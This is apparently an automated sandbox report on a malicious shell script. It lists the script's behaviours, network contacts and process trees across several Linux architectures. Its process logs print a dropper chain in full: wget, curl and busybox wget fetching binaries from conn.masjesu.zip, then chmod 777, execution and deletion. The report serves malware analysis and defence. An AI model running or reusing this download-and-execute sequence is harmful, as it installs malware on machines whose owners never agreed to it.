Analysis Overview
SHA256
cae24d9d229f447e09bee1f6ebe392d45986a77188455ec4abf57f263d86b23c
Threat Level: Shows suspicious behavior
The file cae24d9d229f447e09bee1f6ebe392d45986a77188455ec4abf57f263d86b23c.sh was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Executes dropped EXE
Checks CPU configuration
System Network Configuration Discovery
Reads runtime system information
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-29 02:55
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-29 02:55
Reported
2024-10-29 02:57
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
149s
Max time network
131s
Command Line
Signatures
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Processes
/tmp/cae24d9d229f447e09bee1f6ebe392d45986a77188455ec4abf57f263d86b23c.sh
[/tmp/cae24d9d229f447e09bee1f6ebe392d45986a77188455ec4abf57f263d86b23c.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 151.101.193.91:443 | tcp | |
| GB | 89.187.167.6:443 | tcp | |
| GB | 185.125.188.61:443 | tcp | |
| GB | 185.125.188.61:443 | tcp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-29 02:55
Reported
2024-10-29 02:57
Platform
debian9-armhf-20240611-en
Max time kernel
149s
Max time network
21s
Command Line
Signatures
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
Processes
/tmp/cae24d9d229f447e09bee1f6ebe392d45986a77188455ec4abf57f263d86b23c.sh
[/tmp/cae24d9d229f447e09bee1f6ebe392d45986a77188455ec4abf57f263d86b23c.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-10-29 02:55
Reported
2024-10-29 02:57
Platform
debian9-mipsbe-20240611-en
Max time kernel
105s
Max time network
134s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY | /tmp/20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY | N/A |
| N/A | /tmp/OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h | /tmp/OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h | N/A |
| N/A | /tmp/4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9Ui | /tmp/4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9Ui | N/A |
| N/A | /tmp/kCz9tmOI7m7fFqsqyPerBPFauKdpzNM59z | /tmp/kCz9tmOI7m7fFqsqyPerBPFauKdpzNM59z | N/A |
| N/A | /tmp/O4XrOGB0PWNhMRJWYb3eh74OtbbyiLRzvA | /tmp/O4XrOGB0PWNhMRJWYb3eh74OtbbyiLRzvA | N/A |
| N/A | /tmp/uATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7Ie | /tmp/uATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7Ie | N/A |
| N/A | /tmp/yrI5r9AckmvAtKQGkBWSb9ej7DzTaH5MjK | /tmp/yrI5r9AckmvAtKQGkBWSb9ej7DzTaH5MjK | N/A |
| N/A | /tmp/3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupG | /tmp/3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupG | N/A |
| N/A | /tmp/EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS | /tmp/EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS | N/A |
| N/A | /tmp/4i5A6cAmigaXKnu1hsWvCQ4LebK5gR98uv | /tmp/4i5A6cAmigaXKnu1hsWvCQ4LebK5gR98uv | N/A |
| N/A | /tmp/u0bp4qcR8XFdn4fZU7E5HTezTG7PdNnwZC | /tmp/u0bp4qcR8XFdn4fZU7E5HTezTG7PdNnwZC | N/A |
| N/A | /tmp/2Zr85SzHrHIZpJirZ4bPMTODUUZZuuNQs8 | /tmp/2Zr85SzHrHIZpJirZ4bPMTODUUZZuuNQs8 | N/A |
| N/A | /tmp/HDjjT3VZRkPBsxVNj4oqaJKkID6MviW6qF | /tmp/HDjjT3VZRkPBsxVNj4oqaJKkID6MviW6qF | N/A |
| N/A | /tmp/JUE4bZtGo7FUmoKA9u1BUF0BQUaFkW8y9p | /tmp/JUE4bZtGo7FUmoKA9u1BUF0BQUaFkW8y9p | N/A |
| N/A | /tmp/2Zr85SzHrHIZpJirZ4bPMTODUUZZuuNQs8 | /tmp/2Zr85SzHrHIZpJirZ4bPMTODUUZZuuNQs8 | N/A |
| N/A | /tmp/EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS | /tmp/EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS | N/A |
| N/A | /tmp/4i5A6cAmigaXKnu1hsWvCQ4LebK5gR98uv | /tmp/4i5A6cAmigaXKnu1hsWvCQ4LebK5gR98uv | N/A |
| N/A | /tmp/u0bp4qcR8XFdn4fZU7E5HTezTG7PdNnwZC | /tmp/u0bp4qcR8XFdn4fZU7E5HTezTG7PdNnwZC | N/A |
| N/A | /tmp/HDjjT3VZRkPBsxVNj4oqaJKkID6MviW6qF | /tmp/HDjjT3VZRkPBsxVNj4oqaJKkID6MviW6qF | N/A |
| N/A | /tmp/JUE4bZtGo7FUmoKA9u1BUF0BQUaFkW8y9p | /tmp/JUE4bZtGo7FUmoKA9u1BUF0BQUaFkW8y9p | N/A |
| N/A | /tmp/20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY | /tmp/20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY | N/A |
| N/A | /tmp/OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h | /tmp/OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h | N/A |
| N/A | /tmp/3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupG | /tmp/3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupG | N/A |
| N/A | /tmp/4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9Ui | /tmp/4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9Ui | N/A |
| N/A | /tmp/kCz9tmOI7m7fFqsqyPerBPFauKdpzNM59z | /tmp/kCz9tmOI7m7fFqsqyPerBPFauKdpzNM59z | N/A |
| N/A | /tmp/O4XrOGB0PWNhMRJWYb3eh74OtbbyiLRzvA | /tmp/O4XrOGB0PWNhMRJWYb3eh74OtbbyiLRzvA | N/A |
| N/A | /tmp/uATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7Ie | /tmp/uATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7Ie | N/A |
| N/A | /tmp/yrI5r9AckmvAtKQGkBWSb9ej7DzTaH5MjK | /tmp/yrI5r9AckmvAtKQGkBWSb9ej7DzTaH5MjK | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY | /usr/bin/curl | N/A |
| File opened for modification | /tmp/O4XrOGB0PWNhMRJWYb3eh74OtbbyiLRzvA | /usr/bin/curl | N/A |
| File opened for modification | /tmp/2Zr85SzHrHIZpJirZ4bPMTODUUZZuuNQs8 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/JUE4bZtGo7FUmoKA9u1BUF0BQUaFkW8y9p | /usr/bin/curl | N/A |
| File opened for modification | /tmp/u0bp4qcR8XFdn4fZU7E5HTezTG7PdNnwZC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/HDjjT3VZRkPBsxVNj4oqaJKkID6MviW6qF | /usr/bin/curl | N/A |
| File opened for modification | /tmp/4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9Ui | /usr/bin/curl | N/A |
| File opened for modification | /tmp/OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h | /usr/bin/curl | N/A |
| File opened for modification | /tmp/O4XrOGB0PWNhMRJWYb3eh74OtbbyiLRzvA | /usr/bin/curl | N/A |
| File opened for modification | /tmp/u0bp4qcR8XFdn4fZU7E5HTezTG7PdNnwZC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/2Zr85SzHrHIZpJirZ4bPMTODUUZZuuNQs8 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS | /usr/bin/curl | N/A |
| File opened for modification | /tmp/JUE4bZtGo7FUmoKA9u1BUF0BQUaFkW8y9p | /usr/bin/curl | N/A |
| File opened for modification | /tmp/kCz9tmOI7m7fFqsqyPerBPFauKdpzNM59z | /usr/bin/curl | N/A |
| File opened for modification | /tmp/uATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7Ie | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupG | /usr/bin/curl | N/A |
| File opened for modification | /tmp/4i5A6cAmigaXKnu1hsWvCQ4LebK5gR98uv | /usr/bin/curl | N/A |
| File opened for modification | /tmp/EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupG | /usr/bin/curl | N/A |
| File opened for modification | /tmp/yrI5r9AckmvAtKQGkBWSb9ej7DzTaH5MjK | /usr/bin/curl | N/A |
| File opened for modification | /tmp/4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9Ui | /usr/bin/curl | N/A |
| File opened for modification | /tmp/kCz9tmOI7m7fFqsqyPerBPFauKdpzNM59z | /usr/bin/curl | N/A |
| File opened for modification | /tmp/yrI5r9AckmvAtKQGkBWSb9ej7DzTaH5MjK | /usr/bin/curl | N/A |
| File opened for modification | /tmp/4i5A6cAmigaXKnu1hsWvCQ4LebK5gR98uv | /usr/bin/curl | N/A |
| File opened for modification | /tmp/OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h | /usr/bin/curl | N/A |
| File opened for modification | /tmp/20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY | /usr/bin/curl | N/A |
| File opened for modification | /tmp/uATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7Ie | /usr/bin/curl | N/A |
| File opened for modification | /tmp/HDjjT3VZRkPBsxVNj4oqaJKkID6MviW6qF | /usr/bin/curl | N/A |
Processes
/tmp/cae24d9d229f447e09bee1f6ebe392d45986a77188455ec4abf57f263d86b23c.sh
[/tmp/cae24d9d229f447e09bee1f6ebe392d45986a77188455ec4abf57f263d86b23c.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY]
/bin/chmod
[chmod 777 20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY]
/tmp/20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY
[./20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY]
/bin/rm
[rm 20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h]
/bin/chmod
[chmod 777 OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h]
/tmp/OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h
[./OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h]
/bin/rm
[rm OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9Ui]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9Ui]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9Ui]
/bin/chmod
[chmod 777 4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9Ui]
/tmp/4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9Ui
[./4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9Ui]
/bin/rm
[rm 4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9Ui]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/kCz9tmOI7m7fFqsqyPerBPFauKdpzNM59z]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/kCz9tmOI7m7fFqsqyPerBPFauKdpzNM59z]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/kCz9tmOI7m7fFqsqyPerBPFauKdpzNM59z]
/bin/chmod
[chmod 777 kCz9tmOI7m7fFqsqyPerBPFauKdpzNM59z]
/tmp/kCz9tmOI7m7fFqsqyPerBPFauKdpzNM59z
[./kCz9tmOI7m7fFqsqyPerBPFauKdpzNM59z]
/bin/rm
[rm kCz9tmOI7m7fFqsqyPerBPFauKdpzNM59z]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/O4XrOGB0PWNhMRJWYb3eh74OtbbyiLRzvA]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/O4XrOGB0PWNhMRJWYb3eh74OtbbyiLRzvA]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/O4XrOGB0PWNhMRJWYb3eh74OtbbyiLRzvA]
/bin/chmod
[chmod 777 O4XrOGB0PWNhMRJWYb3eh74OtbbyiLRzvA]
/tmp/O4XrOGB0PWNhMRJWYb3eh74OtbbyiLRzvA
[./O4XrOGB0PWNhMRJWYb3eh74OtbbyiLRzvA]
/bin/rm
[rm O4XrOGB0PWNhMRJWYb3eh74OtbbyiLRzvA]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/uATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7Ie]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/uATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7Ie]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/uATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7Ie]
/bin/chmod
[chmod 777 uATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7Ie]
/tmp/uATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7Ie
[./uATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7Ie]
/bin/rm
[rm uATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7Ie]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/yrI5r9AckmvAtKQGkBWSb9ej7DzTaH5MjK]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/yrI5r9AckmvAtKQGkBWSb9ej7DzTaH5MjK]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/yrI5r9AckmvAtKQGkBWSb9ej7DzTaH5MjK]
/bin/chmod
[chmod 777 yrI5r9AckmvAtKQGkBWSb9ej7DzTaH5MjK]
/tmp/yrI5r9AckmvAtKQGkBWSb9ej7DzTaH5MjK
[./yrI5r9AckmvAtKQGkBWSb9ej7DzTaH5MjK]
/bin/rm
[rm yrI5r9AckmvAtKQGkBWSb9ej7DzTaH5MjK]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupG]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupG]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupG]
/bin/chmod
[chmod 777 3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupG]
/tmp/3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupG
[./3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupG]
/bin/rm
[rm 3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupG]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS]
/bin/chmod
[chmod 777 EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS]
/tmp/EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS
[./EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS]
/bin/rm
[rm EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/4i5A6cAmigaXKnu1hsWvCQ4LebK5gR98uv]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/4i5A6cAmigaXKnu1hsWvCQ4LebK5gR98uv]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/4i5A6cAmigaXKnu1hsWvCQ4LebK5gR98uv]
/bin/chmod
[chmod 777 4i5A6cAmigaXKnu1hsWvCQ4LebK5gR98uv]
/tmp/4i5A6cAmigaXKnu1hsWvCQ4LebK5gR98uv
[./4i5A6cAmigaXKnu1hsWvCQ4LebK5gR98uv]
/bin/rm
[rm 4i5A6cAmigaXKnu1hsWvCQ4LebK5gR98uv]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/u0bp4qcR8XFdn4fZU7E5HTezTG7PdNnwZC]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/u0bp4qcR8XFdn4fZU7E5HTezTG7PdNnwZC]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/u0bp4qcR8XFdn4fZU7E5HTezTG7PdNnwZC]
/bin/chmod
[chmod 777 u0bp4qcR8XFdn4fZU7E5HTezTG7PdNnwZC]
/tmp/u0bp4qcR8XFdn4fZU7E5HTezTG7PdNnwZC
[./u0bp4qcR8XFdn4fZU7E5HTezTG7PdNnwZC]
/bin/rm
[rm u0bp4qcR8XFdn4fZU7E5HTezTG7PdNnwZC]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/2Zr85SzHrHIZpJirZ4bPMTODUUZZuuNQs8]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/2Zr85SzHrHIZpJirZ4bPMTODUUZZuuNQs8]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/2Zr85SzHrHIZpJirZ4bPMTODUUZZuuNQs8]
/bin/chmod
[chmod 777 2Zr85SzHrHIZpJirZ4bPMTODUUZZuuNQs8]
/tmp/2Zr85SzHrHIZpJirZ4bPMTODUUZZuuNQs8
[./2Zr85SzHrHIZpJirZ4bPMTODUUZZuuNQs8]
/bin/rm
[rm 2Zr85SzHrHIZpJirZ4bPMTODUUZZuuNQs8]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/HDjjT3VZRkPBsxVNj4oqaJKkID6MviW6qF]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/HDjjT3VZRkPBsxVNj4oqaJKkID6MviW6qF]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/HDjjT3VZRkPBsxVNj4oqaJKkID6MviW6qF]
/bin/chmod
[chmod 777 HDjjT3VZRkPBsxVNj4oqaJKkID6MviW6qF]
/tmp/HDjjT3VZRkPBsxVNj4oqaJKkID6MviW6qF
[./HDjjT3VZRkPBsxVNj4oqaJKkID6MviW6qF]
/bin/rm
[rm HDjjT3VZRkPBsxVNj4oqaJKkID6MviW6qF]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/JUE4bZtGo7FUmoKA9u1BUF0BQUaFkW8y9p]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/JUE4bZtGo7FUmoKA9u1BUF0BQUaFkW8y9p]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/JUE4bZtGo7FUmoKA9u1BUF0BQUaFkW8y9p]
/bin/chmod
[chmod 777 JUE4bZtGo7FUmoKA9u1BUF0BQUaFkW8y9p]
/tmp/JUE4bZtGo7FUmoKA9u1BUF0BQUaFkW8y9p
[./JUE4bZtGo7FUmoKA9u1BUF0BQUaFkW8y9p]
/bin/rm
[rm JUE4bZtGo7FUmoKA9u1BUF0BQUaFkW8y9p]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/2Zr85SzHrHIZpJirZ4bPMTODUUZZuuNQs8]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/2Zr85SzHrHIZpJirZ4bPMTODUUZZuuNQs8]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/2Zr85SzHrHIZpJirZ4bPMTODUUZZuuNQs8]
/bin/chmod
[chmod 777 2Zr85SzHrHIZpJirZ4bPMTODUUZZuuNQs8]
/tmp/2Zr85SzHrHIZpJirZ4bPMTODUUZZuuNQs8
[./2Zr85SzHrHIZpJirZ4bPMTODUUZZuuNQs8]
/bin/rm
[rm 2Zr85SzHrHIZpJirZ4bPMTODUUZZuuNQs8]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS]
